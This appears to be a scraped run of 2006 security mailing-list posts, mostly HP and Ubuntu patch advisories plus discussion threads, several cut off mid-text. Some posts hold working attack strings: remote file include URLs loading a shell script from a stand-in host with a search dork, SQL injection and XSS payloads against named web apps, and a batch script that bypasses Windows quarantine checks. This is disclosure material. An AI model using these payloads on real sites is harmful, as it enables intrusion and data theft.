[security bulletin] HPSBMA02098 SSRT5911 rev.1 - HP OpenView Network Node Manager (OV NNM) Remote Unauthorized Privileged Access, Arbitrary Command Execution, Arbitrary File Creation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00672314 Version: 1 HPSBMA02098 SSRT5911 rev.1 - HP OpenView Network Node Manager (OV NNM) Remote Unauthorized Privileged Access, Arbitrary Command Execution, Arbitrary File Creation NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2006-05-22 Last Updated: 2006-05-22 Potential Security Impact: Remote unauthorized privileged access, arbitrary command execution, arbitrary file creation Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). These vulnerabilities could be exploited remotely by an unauthorized user to gain privileged access, execute arbitrary commands, or create arbitrary files. References: None SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP OpenView Network Node Manager (OV NNM) 6.20, 6.4x, 7.01, 7.50 running on HP-UX B.11.00, B.11.11, and B.11.23, Solaris, Windows NT, Windows 2000, Windows XP, and Linux. BACKGROUND The Hewlett-Packard Company thanks NGSSoftware for reporting these vulnerabilities to [EMAIL PROTECTED] To determine if a system has an affected version, search the output of "swlist -a revision -l fileset" for one of the filesets listed below. For affected systems verify that the recommended action has been taken. AFFECTED VERSIONS For HP-UX OV NNM 7.50 HP-UX B.11.23 (IA) = OVNNMgr.OVNNM-RUN action: install PHSS_34099 or subsequent HP-UX B.11.23 HP-UX B.11.11 HP-UX B.11.00 = OVNNMgr.OVNNM-RUN action: install PHSS_34098 or subsequent For HP-UX OV NNM 7.01 HP-UX B.11.00 HP-UX B.11.11 = OVNNMgr.OVNNM-RUN action: install PHSS_33842 or subsequent For HP-UX OV NNM 6.4x HP-UX B.11.00 HP-UX B.11.11 = OVNNMgr.OVNNM-RUN action: install PHSS_34202 or subsequent For HP-UX OV NNM 6.20 HP-UX B.11.00 HP-UX B.11.11 = OVNNMgr.OVNNM-RUN action: install PHSS_34008 or subsequent For Solaris OV NNM 7.50 SunOS 5.6 SunOS 5.7 SunOS 5.8 SunOS 5.9 = action: install PSOV_03436 or subsequent For Solaris OV NNM 7.01 SunOS 5.6 SunOS 5.7 SunOS 5.8 SunOS 5.9 = action: install PSOV_03430 or subsequent For Solaris OV NNM 6.4x SunOS 5.6 SunOS 5.7 SunOS 5.8 SunOS 5.9 = action: install PSOV_03437 or subsequent For Solaris OV NNM 6.20 SunOS 5.6 SunOS 5.7 SunOS 5.8 SunOS 5.9 = action: install PSOV_03434 or subsequent For Windows OV NNM 7.50 Windows NT Windows 2000 Windows XP = action: install NNM_01115 or subsequent For Windows OV NNM 7.01 Windows NT Windows 2000 Windows XP = action: install NNM_01110 or subsequent For Windows OV NNM 6.4x Windows NT Windows 2000 Windows XP = action: install NNM_01116 or subsequent For Windows OV NNM 6.20 Windows NT Windows 2000 Windows XP = action: install NNM_01113 or subsequent For Linux OV NNM 7.50 Linux RedHatAS2.1 = action: install LSOV_00026 or subsequent END AFFECTED VERSIONS RESOLUTION HP has provided the following patches to resolve this potential vulnerability. These patches are available from http://support.openview.hp.com/patches/ NNM 7.50 HP-UX B.11.23 (IA) - PHSS_34099 or subsequent HP-UX B.11.23 - PHSS_34098 or subsequent HP-UX B.11.11 - PHSS_34098 or subsequent HP-UX B.11.00 - PHSS_34098 or subsequent Linux RedHatAS2.1 - LSOV_00026 or subsequent Solaris - PSOV_03436 or subsequent Windows - NNM_01115 or subsequent NNM 7.01 HP-UX B.11.11 - PHSS_33842 or subsequent HP-UX B.11.00 - PHSS_33842 or subsequent Solaris - PSOV_03430 or subsequent Windows - NNM_01110 or subsequent NNM 6.4x HP-UX B.11.11 - PHSS_34202 or subsequent HP-UX B.11.00 - PHSS_34202 or subsequent Solaris - PSOV_03437 or subsequent Windows - NNM_01116 or subsequent NNM 6.20 HP-UX B.11.11 - PHSS_34008 or subsequent HP-UX B.11.00 - PHSS_34008 or subsequent Solaris - PSOV_03434 or subsequent Windows - NNM_01113 or subsequent MANUAL ACTIONS: Non-HP-UX only Install the patches listed in the Resolution section for Solaris, Windows NT, Windows 2000, Windows XP, and Linux. PRODUCT SPECIFIC INFORMATION HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. For more information: http://software.hp.com/portal/swdepot/displayProductInfo.do? productNumber=B6834AA HISTORY Version:1 (rev.1) - 22 May 2006 Initial release Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit info
[security bulletin] HPSBMA02121 SSRT061157 rev.1 - HP OpenView Storage Data Protector Remote Arbitrary Command Execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00671912 Version: 1 HPSBMA02121 SSRT061157 rev.1 - HP OpenView Storage Data Protector Remote Arbitrary Command Execution NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2006-05-22 Last Updated: 2006-05-22 Potential Security Impact: Remote arbitrary command execution Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP OpenView Storage Data Protector running on HP-UX, IBM AIX, Linux, Microsoft Windows, and Solaris. This vulnerability could allow a remote unauthorized user to execute arbitrary commands. References: None SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP OpenView Storage Data Protector 5.1 and 5.5 running on HP-UX, IBM AIX, Linux, Microsoft Windows, and Solaris. BACKGROUND To determine if an HP-UX system has an affected version, search the output of "swlist -a revision -l fileset" for one of the filesets listed below. For affected systems verify that the recommended action has been taken. AFFECTED VERSIONS For HP OpenView Storage Data Protector 5.1 HP-UX B.11.23 (IA) HP-UX B.11.23 (PA) HP-UX B.11.11 HP-UX B.11.00 == DATA-PROTECTOR.OMNI-CORE action: install inet file per instructions in SSPUX510_091.txt For HP OpenView Storage Data Protector 5.5 HP-UX B.11.23 (IA) HP-UX B.11.23 (PA) HP-UX B.11.11 HP-UX B.11.00 == DATA-PROTECTOR.OMNI-CORE action: install inet file per instructions in SSPUX550_108.txt END AFFECTED VERSIONS RESOLUTION HP has made the following software updates available to resolve the issue. The software updates can be downloaded via ftp from: System: hprc.external.hp.com (192.170.19.100) Login: ss061157 Password: ss061157 (NOTE: CASE-sensitive) ftp://ss061157:[EMAIL PROTECTED]/ ftp://ss061157:[EMAIL PROTECTED]/ HP OpenView Storage Data Protector 5.1 for HP-UX, IBM AIX, and Linux SSPUX510_091.shar md5 sum: 4d3c046c57c0d1d5e157ad669d5a7fcd cksum: 1130317700 1579112 HP OpenView Storage Data Protector 5.1 for Solaris SSPSOL510_017.shar md5 sum: baf1abe0c6a3d94746e0ba5eaa6cfee0 cksum: 193646770 270279 HP OpenView Storage Data Protector 5.1 for Windows SSPNT510_080.exe md5 sum: 60cd226ccad50a7eb88ce8cd1962e141 cksum: 4116776482 883301 SSPNT510_080.txt md5 sum: 4235f1c22b2964e38c3ff9d868c6bc8e cksum: 3751212316 1845 HP OpenView Storage Data Protector 5.5 for HP-UX, IBM AIX, and Linux SSPUX550_108.shar md5 sum: 3ebe295708b80a50425e7eff06f65c52 cksum: 2124891781 1576372 HP OpenView Storage Data Protector 5.5 for Solaris SSPSOL550_030.shar md5 sum: 0f9a9e8c2308dd0d067e50e9d0f9cef4 cksum: 794649287 304745 HP OpenView Storage Data Protector 5.5 for Windows SSPNT550_110.exe md5 sum: 978425b36b2964fecc841b0366b95b83 cksum: 2226993465 931601 SSPNT550_110.txt mdr sum: 2fb38e4db600380235cb02edc4b0774e cksum: 827860573 1847 The installation instructions are in the 'txt' files. For HP-UX, IBM AIX, Linux, and Solaris the 'txt' files are contained in the 'shar' files. The 'shar' files are stored on the ftp site in gzip format: SSPUX510_091.shar.gz SSPUX550_108.shar.gz SSPSOL510_017.shar.gz SSPSOL550_030.shar.gz The files listed above will be available from the ftp site for sixty days after the initial release of this Security Bulletin. After that the files can be obtained by contacting HP Support. MANUAL ACTIONS: Yes - NonUpdate Download and install the files as discussed in the Resolution section. PRODUCT SPECIFIC INFORMATION HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. For more information: http://software.hp.com/portal/swdepot/displayProductInfo.do? productNumber=B6834AA HISTORY: Version: 1 (rev.1) - 22 May 2006 Initial release Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&; langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an
[USN-285-1] awstats vulnerability
=== Ubuntu Security Notice USN-285-1 May 23, 2006 awstats vulnerability CVE-2006-2237 === A security issue affects the following Ubuntu releases: Ubuntu 5.04 (Hoary Hedgehog) Ubuntu 5.10 (Breezy Badger) The following packages are affected: awstats The problem can be corrected by upgrading the affected package to version 6.3-1ubuntu0.2 (for Ubuntu 5.04), or 6.4-1ubuntu1.1 (for Ubuntu 5.10). In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: AWStats did not properly sanitize the 'migrate' CGI parameter. If the update of the stats via web front-end is allowed, a remote attacker could execute arbitrary commands on the server with the privileges of the AWStats server. This does not affect AWStats installations which only build static pages. Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.3-1ubuntu0.2.diff.gz Size/MD5:25306 1f013ca8aaad65d8f3ae148e194b3551 http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.3-1ubuntu0.2.dsc Size/MD5: 595 46a103a327e1f1bad3876927c7e66198 http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.3.orig.tar.gz Size/MD5: 938794 edb73007530a5800d53b9f1f90c88053 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.3-1ubuntu0.2_all.deb Size/MD5: 726430 728ee50f468a4cf3693a32b98c94b455 Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.4-1ubuntu1.1.diff.gz Size/MD5:18541 e186b842fbd2d4d97b65eacf7c9c1295 http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.4-1ubuntu1.1.dsc Size/MD5: 595 c5784c2c1bfa002abbfa77d936bc2da5 http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.4.orig.tar.gz Size/MD5: 918435 056e6fb0c7351b17fe5bbbe0aa1297b1 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.4-1ubuntu1.1_all.deb Size/MD5: 728490 60ca39a436e3a21a838560db5d8a5f3b signature.asc Description: Digital signature
DGbook v1.0 - XSS
DGbook v1.0 - XSS Homepage: http://www.diangemilang.com/dgscripts.php Description: This is Guestbook script, write on PHP from Dian Gemilang. Feature: Field validation, Limit character, Charecter filtering - This feature will remove "<" and ">" character, so user can't input HTML tag -, Auto Focus - This feature will make user cursor on the first form field - It's easy to install. Requare PHP, MYQL and phpmyadmin for dump the database. Effected files: Name, homepage, and address input boxes on index.php XSS Vuln: < and > may be filtered however, they are not filtered in the name, homepage and address text boxes. Only in the comment box. Example of putting html code in the name & address box: http://www.evilsite.com'))">
Re: How secure is software X?
Fabian Becker wrote: > in my opinion a software can either be secure or not secure. > I think it's a bit like a woman cannot be "a bit pregnant". > The problem with this view is that it ignores both time and differential knowledge: who knows something, and when do they know it? While it is true that a given block of bits is either vulnerable (has one or more exploitable defects) or secure (has zero exploitable defects) this is only relevant in the case of perfect omniscience: you know absolutely everything about that instance of the software. But knowing everything is improbable. Software is complex, and there likely isn't enough time to explore all possible angles of attack. A trivial counter-example is printf format string attacks: they were unknown prior to 2000, when the attack class was disclosed, and then there were zillions of fresh vulnerabilities. So a discussion of relative vulnerability certainly is relevant to the practical world. Relative vulnerability is the question "what is the *work factor* of finding a vulnerability in this piece of software?" A program that shows vulnerabilities 10 seconds into a fuzz scan is extremely vulnerable. A program that shows no vulnerabilities after months or years of scrutiny (qmail & postfix) is highly secure, even though it is probable that it contains *some* vulnerability. My Sardonix project has been mentioned in this thread. Sardonix attempted to measure the security of programs based on a record of the skills of people who had audited it, and conversely measured the auditors based on the programs they had audited vs. the quality of their audits. Sardonix failed due to lack of participation, likely because it asked far too much from the auditors. What is needed for a more successful project is a lighter-weight way to record who has audited a program. The standard that Litchfield proposed could become that: similar to CDDB, it would just log who has audited the program, and users can make whatever they want of that record. Crispin -- Crispin Cowan, Ph.D. http://crispincowan.com/~crispin/ Director of Software Engineering, Novell http://novell.com
RE: Circumventing quarantine control in Windows 2003 and ISA 2004
This is something that has been reported to Microsoft many, many times for nearly two years (at least the NAQC) issue (including by me), and yes, their response is the same as you have reported. The real answer is not to use it if it doesn't meet your needs. There is no better vote than with dollars. Another solution is to build a better authentication/authorization mechanism than a simple string, say something along a challenge-response solution with a timestamp. It can be done, it's only unfortunate that it takes much additional programming on both the client-side checks and the authentication/authorization response. Personally, I think it is one of the most unfriendly NAC/NAP products out there. Hard to configure, requires RRAS (although not IAS as most people think), requires non-legacy Windows clients, and has many security gaps. The next version will be better, but I find it hard to believe it will be better than all the other solutions I can plug in and get running in under an hour across a wide spectrum of clients (e.g. Verniers EdgeWall, StillSecure, etc.). I've covered many network access control solutions for InfoWorld, and we are doing some more product reviews soon. I encourage anyone interested in network access control solutions to search on a few of these products on www.infoworld.com, to see the good and the bad of each, before buying one. None are perfect, but there are certainly a few solutions that are far ahead of the game in terms of ease-of-use, platform support, protocol support, and security. To Microsoft's credit, NAQC is free (currently...there may be an additional license fee in the future) with Server 2003, so it's a free option for many administrators, who only need what it has. If anyone is interested in how to configure NAQC, just send me an email and I'll send you step-by-step slides. Roger * *Roger A. Grimes, InfoWorld, Security Columnist *CPA, CISSP, MCSE: Security (2000/2003/MVP), CEH, yada...yada... *email: [EMAIL PROTECTED] or [EMAIL PROTECTED] *Author of Professional Windows Desktop and Server Hardening (Wrox) *http://www.amazon.com/gp/product/0764599909 * -Original Message- From: Memet Anwar [mailto:[EMAIL PROTECTED] Sent: Thursday, May 18, 2006 5:50 AM To: bugtraq@securityfocus.com Subject: Circumventing quarantine control in Windows 2003 and ISA 2004 For those unfamiliar with MS quarantine control, you can read Jon Hassel's tutorial on Windows 2003 Network Access Quarantine Control (NAQC) [http://www.securityfocus.com/infocus/1794], and the ISA 2004 VPN Quarantine (ISAQ) feature [http://www.securityfocus.com/infocus/1799]. A simplistic mechanism used in both NAQC and ISAQ enable users to bypass the requirement set by administrators (such as XP must run SP2, should have latest virus-def, etc.). The problem is due to how the requirements are validated, it is trivial for users to trick RRAS/ISA into believing that the client's system are always aligned with the requirements, regardless the actual condition. To illustrate my point, I will use Jon's article part-1 mentioned above, because it is much the same with Microsoft description on the subject that I see on MOC-2824B training material. Please refer to 'A Step-by-Step Overview of NAQC'-part of the article. There, step 1-7 will put the client connection into quarantine mode, which is fine. Step 8-9 shows that the CMAK profile will execute a client-side script to validate client's configuration based on the preconfigured baseline. If the client meets the requirement, the script should call rqc.exe with appropriate parameter. In Step 10-14, rqc.exe in the client send its result status to rqs.exe (the listener) on the server, along with its script version string. The listener then compare the script version string with its reference, before reconfiguring the session to a normal access. Now I see two weaknesses there. First, it is trivial for users to ensure that rqc.exe will always report success back to rqs.exe, regardless the actual condition of his/her system. The script (or any executables used) can be modified or replaced, and it will always work as long as the replacement knows what parameter must be obtained from CMAK, and what should be passed to rqc.exe. Second, in step 12, rqs.exe only performs string comparison of the script version to verify wether the correct script is in use by client. For example, if the admin-supplied script is a .cmd file, a user can replace the content with something like the following. Note that .vbs or .exe files can also be replaced, as long the same functionality is provided. @echo off @rem Use %ServiceDir% to locate rqc.exe. SET RQCLOC=%1\rqc.exe SET REMOVAL=get_this_from_the_orig_script %RQCLOC% %2 %3 7250 %4 %5 %REMOVAL% I've reported this issue to MSRC as a design flaw that could allow what they call 'ungrante
Re: Sun single-CPU DOS
On Fri, 19 May 2006, Mike O'Connor wrote: > :single CPU Sun microsystems system running solaris7, 8, or 9 > :(haven't tested on 10). E.g. netra. > : > :if you telnet to a local router, disable nagle (on purpose > :or by accident or whatever - if nagle is turned off), and then > > TCP_NODELAY by any other name, I assume. > > :ping another device with interpacket delay of 0 and a count > > Define what you mean by "interpacket delay". Are you referring to an > Ethernet-specific setting, perhaps? Ethernet's "interpacket gap" is > really about the gap between Ethernet frames, not IP packets. Having > "packet" in the terminology leads people to think it's an IP thing, > and ranks up their with "collisions" as far as misleading Ethernet > terminology goes. Think of it as "interframe gap", or IFG. cisco router. extending ping. 0 delay. I was speaking of cisco ping. I should have said 'timeout'. mea culpa. > > For that manner, define "ping". You're certainly not talking about > /usr/sbin/ping, but something that spews out TCP, correct? It sounds > like you're hitting the Sun system with a TCP ping stream -from- your > router, correct? running ping on the cisco to another device (preferably a fast cisco as the source and a nice fast interface like a gige or a IP/sonet) > > :of somewhere above 100,000 pings, it will effectively > :DOS the machine you are telneting from. > : > :The machine becomes unusable, will not accept break on console. > :totally hung. > : > :After opening a case with Sun on this issue and going back and > :forth for 9 months, they have decided that I am manufacturing > :jabber and the appropriate course of action is to remove the > :offending device (the router in this case) from the network. > > If you're talking IFG... > > Having an IFG < 96 "bittimes (where the wall-clock units for bittimes > varies as a function of specific ethernet speed) leads to out-of-spec > Ethernet frames, which could reasonably be parsed as "jabber". The > too-short IFG could lead the other node(s) in the ethernet not knowing > when you've stopped sending any given frame. In a shared ethernet, > you can also end up with fun conditions like the "capture effect". dedicated, switched Ethernet here. it seems to mostly overwhelm the sun's interupt processing, but that's just a theory since Sun has decided that the solution is to unplug the machine on the other end. We're only talking about 14000 packets per second to kill a netra T1. I've been able to drive one faster than that via other means without causing a 'jabber effect'. > > There's no requirement for the networking to that particular interface > on the Sun to actually work in the face of a too-short IFG or any other > physical out-of-spec condition. Now, that doesn't mean the -console- > should go out to lunch (sounds like you're getting a little too much > "The Network Is The Computer" :) ), but it's perfectly ok to simply not > listen or xmit on an ethernet that's chronically out-of-spec. > indeed. that's my issue, the console should not be hung. The machine should not require a hard reset. And, I do not believe there is an electrical problem. I'm not doing anything down that low, It's just a TCP/IP stream, and, a not outrageous one at at that. > If Sun were to tweak things so it could detect and log the out-of-spec > network and react to it by downing the interface, rather than just keep > listening and accumulating a ton of bogusly-spaced interrupts that bog > it down, that would seem to be reasonable. Some Unixes have userspace > routing daemons that periodically look for network brokenness and will > ifconfig the interface down But, if the system is bogged down quickly > enough where that those processes never get a chance to run, such forms > of mitigation won't work. > > Oh as an important side note -- your Sun is set up where it won't hang > owing to network dependencies if its interface is ifconfig'ed up, but > the actual network it talks to is offline, right? Otherwise, you are > making yourself DoS-prone in a whole lot of ways besides pfutzing with > out-of-spec ethernets. > correct. standalone mechine. (even if it were not, there would still be response on console to, e.g. break) > :In other words, they refuse to fix the DOS issue under the assertion > :that it is a physical issue rather than an issue of the OS > :improperly handling a stream of small TCP packets. > > My -suspicion- here is that it's the interrupts that the "stream of > small TCP packets" generates that is leading to the system hang, but > it'd take some kernel profiling to understand the specific impact. > If the only way to generate the particular concentration of network > interrupts along that ethernet interface involves outright breaking > the ethernet spec, I can see where Sun rejects this as bogus from a > -security- perspective. > See, that's where I have trouble. From a Security perspective, you'd want to avoid the DOS via some kind of drop or disable me
[security bulletin] HPSBUX02075 SSRT051074 rev.5 - HP-UX Running xterm Local Unauthorized Access
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c0016 Version: 5 HPSBUX02075 SSRT051074 rev.5 - HP-UX Running xterm Local Unauthorized Access NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2005-11-11 Last Updated: 2006-05-19 Potential Security Impact: Local unauthorized access Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP-UX running xterm. The vulnerability could be exploited by a local user to gain unauthorized access. References: none SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.00, B.11.11, B.11.23. BACKGROUND To determine if an HP-UX system has an affected version, search the output of "swlist -a revision -l fileset" for one of the filesets listed below. For affected systems verify that the recommended action has been taken. AFFECTED VERSIONS HP-UX B.11.00 = X11.X11-RUN-CL - ->action: install PHSS_34160 or subsequent HP-UX B.11.11 = X11.X11-RUN-CL action: install PHSS_34102 or subsequent HP-UX B.11.23 = X11.X11-RUN-CL action: install PHSS_34159 or subsequent END AFFECTED VERSIONS RESOLUTION HP has provided the following patches to resolve the issue: B.11.00 - PHSS_34160 or subsequent B.11.11 - PHSS_34102 or subsequent B.11.23 - PHSS_34159 or subsequent The patches can be downloaded from http://itrc.hp.com MANUAL ACTIONS: No PRODUCT SPECIFIC INFORMATION HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. For more information: http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA HISTORY Version:1 (rev.1) - 13 November 2005 Initial release Version:2 (rev.2) - 22 November 2005 Preliminary xterm files are available. Version:3 (rev.3) - 5 January 2006 B.11.11 patch is available. Version:4 (rev.4) - 25 April 2006 B.11.23 patch is available. Version:5 (rev.5) - 22 May 2006 B.11.00 patch is available. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&; langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW, MA = HP Management Agents, MI = Misc. 3rd party SW, MP = HP MPE/iX, NS = HP NonStop Servers, OV = HP OpenVMS, PI = HP Printing & Imaging, ST = HP Storage SW, TL = HP Trusted Linux, TU = HP Tru64 UNIX, UX = HP-UX, VV = HP Virtual Vault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular
Alstrasoft Article Manager Pro v1.6
Alstrasoft Article Manager Pro v1.6 - XSS & Full Path errors Homepage: http://www.alstrasoft.com Description: Article Manager Pro is the next generation article publishing system designed to make your life a whole lot easier by enabling webmasters to publish articles or news into their website in a matter of minutes with our advance WYSIWYG editor that includes features such as a built-in spell checker, word finder and many more. Effected files: profile.php userarticles.php submit_article.php mraticles.php admin.php Exploits & Vulns: SQL Injection query error http://www.example.com/article/profile.php?author_id=1' 1064 : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 SQL Injection: http://www.example.com/article/userarticles.php?aut_id=3 or 3=3-- Proof Of Concept: All articles in DB appear on page when the above query is preformed. Full path errors http://www.example.com/article/userarticles.php?aut_id=3' Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html /article/functions.php on line 212 Invalid user id supplied! http://www.example.com/article/mrarticles.php?action=read' Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html /article/mrarticles.php on line 50 http://www.example.com/article/admin/admin.php?login Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html /article/admin/auth.php on line 18 submit_article.php XSS Vuln. When submitting an article using the submit_article.php file, input is not filtered. All the user has to do is enter something like
AlstraSoft E-Friends - XSS
AlstraSoft E-Friends - XSS Homepage: http://www.alstrasoft.com/ Description: Alstrasoft E-friends allows you to run a community site like MySpace and Friendster. Effected files or areas of site: index.php The input forms on the following items belowdo not properlly filter out all potential harmful characters. XSS are possible because of this. Posting a blog Posting a listing Posting an event Adding comments Sending a message
phpMyDirectory <= 10.4.4 Multiple Remote File Include(new!)
ENGLISH # Title : phpMyDirectory <= 10.4.4 Multiple Remote File Include Vulnerabilities # Dork : "powered by phpmydirectory" # Author : ajann # greetz : Nukedx,TheHacker # Exploit; ### http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls ### http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls ### http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls ### SOME; http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls # ajann,Turkey TURKISH # Başlık : phpMyDirectory <= 10.4.4 Multiple Remote File Include Vulnerabilities # Sözcük[Arama] : "powered by phpmydirectory" # Açığı Bulan : ajann # greetz : Nukedx,TheHacker # Açık bulunan dosyalar; ### http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls ### http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls ### http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls ### SOME; http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls Açıklama: Temalarda bulunan footer.php dosyası güvenlik açığına yol açmaktadır.Bu sayede uzaktan kod çalıştırılabilir. defaults_setup.php kurulumdan sonra silinmemişse aynı açık uygulanabilmektedir. test/header.php bölümü ise bazen denk gelmektedir,aynı açık bulunmaktadır. Açık 10.4.4 dahil alt sürümlerinde çalışmaktadır. Thanks.
[security bulletin] HPSBUX02114 SSRT061115 rev.1 - HP-UX Running Software Distributor Local Elevation of Privilege
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00659649 Version: 1 HPSBUX02114 SSRT061115 rev.1 - HP-UX Running Software Distributor Local Elevation of Privilege NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2006-05-22 Last Updated: 2006-05-22 Potential Security Impact: Local elevation of privilege Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP-UX running Software Distributor. These vulnerabilities could be exploited by a local authorized user to gain elevated privileges. References: None SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.00, B.11.04, B.11.11, B.11.23 running Software Distributor BACKGROUND The Hewlett-Packard Company thanks NCC Group for reporting this vulnerability to [EMAIL PROTECTED] AFFECTED VERSIONS HP-UX B.11.23 = SW-DIST.SD-CMDS action: install revision B.11.23.0606.045 or subsequent HP-UX B.11.11 = SW-DIST.SD-CMDS action: install PHCO_34539 or subsequent HP-UX B.11.04 = SW-DIST.SD-CMDS action: install PHCO_34814 or subsequent HP-UX B.11.00 = SW-DIST.SD-CMDS action: install PHCO_34568 or subsequent END AFFECTED VERSIONS RESOLUTION HP has made the following software updates available to resolve the issue. The patches are available from http://itrc.hp.com The software update is available from http://www.hp.com/go/softwaredepot/ HP-UX B.11.23 - B.11.23.0606.045 or subsequent HP-UX B.11.11 - PHCO_34539 or subsequent HP-UX B11.04 - PHCO_34814 or subsequent HP-UX B.11.00 - PHCO_34568 or subsequent MANUAL ACTIONS: Yes - Update B.11.23 - install revision B.11.23.0606.045 or subsequent B.11.11 - no manual actions B.11.04 - no manual actions B.11.00 - no manual actions PRODUCT SPECIFIC INFORMATION HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. For more information: http://software.hp.com/portal/swdepot/displayProductInfo.do? productNumber=B6834AA HISTORY Version: 1 (rev.1) - 22 May 2006 Initial release Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&; 